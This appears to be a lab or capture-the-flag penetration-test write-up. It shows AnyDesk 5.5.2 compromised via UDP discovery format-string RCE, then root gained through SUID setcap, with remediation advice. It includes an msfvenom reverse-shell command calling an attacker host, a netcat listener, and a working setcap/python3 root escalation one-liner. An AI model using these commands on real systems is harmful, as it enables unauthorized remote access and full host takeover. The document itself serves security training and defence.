Case file

AnyDesk 5.5.2 UDP discover RCE and setcap privilege escalation

Intermediate remote-access engagement: AnyDesk 5.5.2 format-string RCE over UDP discovery (CVE-2020-13160 class) yielded a shell; SUID setcap plus cap_setuid on a copied python3 completed root.

Intermediate28 minLinux · AnyDesk · RCE · Capabilities
  • AnyDesk on TCP 7070 with discovery on UDP 50001 accepted a malicious discover packet that executed shellcode. Post-exploitation abused SUID setcap to grant cap_setuid to python3.

  • nmap and openssl confirmed AnyDesk on 7070; searchsploit returned the 5.5.2 RCE.

  • msfvenom produced shellcode; the Python discover exploit sent it to UDP 50001 and our listener caught the shell.

  • SUID /sbin/setcap granted cap_setuid+ep on a local python3 copy; setuid(0) spawned root.

01

Engagement summary

AnyDesk on TCP 7070 with discovery on UDP 50001 accepted a malicious discover packet that executed shellcode. Post-exploitation abused SUID setcap to grant cap_setuid to python3.

Host ANNIE (10.10.29.248) ran AnyDesk 5.5.2. After confirming the SSL listener on 7070, we used the public UDP discovery exploit (Exploit-DB / searchsploit AnyDesk 5.5.2 RCE — CVE-2020-13160 class format string) with msfvenom linux/x64 reverse shellcode (bad chars \x00\x25\x26). A reverse shell landed as annie. Enumeration showed /sbin/setcap SUID; copying /usr/bin/python3 and applying cap_setuid+ep allowed os.setuid(0) to a root shell.

Business impact

Unpatched remote-support agents are unauthenticated RCE on the corporate network. SUID setcap lets any local user mint dangerous capabilities. Patch or remove AnyDesk 5.5.2, restrict discovery exposure, and never ship setcap as SUID.

02

Service discovery and version pin

nmap and openssl confirmed AnyDesk on 7070; searchsploit returned the 5.5.2 RCE.

OPERATOR · NMAP

savvy@lab:~$ nmap -sC -sV 10.10.29.248

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH

7070/tcp open ssl/anydesk AnyDesk

savvy@lab:~$ openssl s_client -connect 10.10.29.248:7070

subject=... AnyDesk ...

savvy@lab:~$ searchsploit anydesk

AnyDesk 5.5.2 - Remote Code Execution

03

UDP discovery format-string RCE

msfvenom produced shellcode; the Python discover exploit sent it to UDP 50001 and our listener caught the shell.

OPERATOR · MSFVENOM

savvy@lab:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode

Payload size: ... bytes

Saved as: shellcode (paste into exploit)

OPERATOR · EXPLOIT

# exploit targets AnyDesk discovery UDP/50001 with format-string + shellcode

savvy@lab:~$ nc -lvnp 4444

savvy@lab:~$ python3 anydesk_rce.py

savvy@lab:~$

savvy@lab:~$ id

uid=1000(annie) gid=1000(annie) groups=1000(annie)

04

SUID setcap to cap_setuid python

SUID /sbin/setcap granted cap_setuid+ep on a local python3 copy; setuid(0) spawned root.

OPERATOR · SETCAP

savvy@lab:~$ find / -perm -4000 -type f 2>/dev/null

/sbin/setcap

savvy@lab:~$ cp /usr/bin/python3 /home/annie/python3

savvy@lab:~$ /sbin/setcap cap_setuid+ep /home/annie/python3

savvy@lab:~$ getcap /home/annie/python3

/home/annie/python3 = cap_setuid+ep

savvy@lab:~$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

root@lab:~# id

uid=0(root) gid=1000(annie) groups=1000(annie)

Remediation

Upgrade or remove AnyDesk; block UDP 50001 at the edge where remote support is not required. Remove the setuid bit from setcap; audit file capabilities with getcap -r regularly.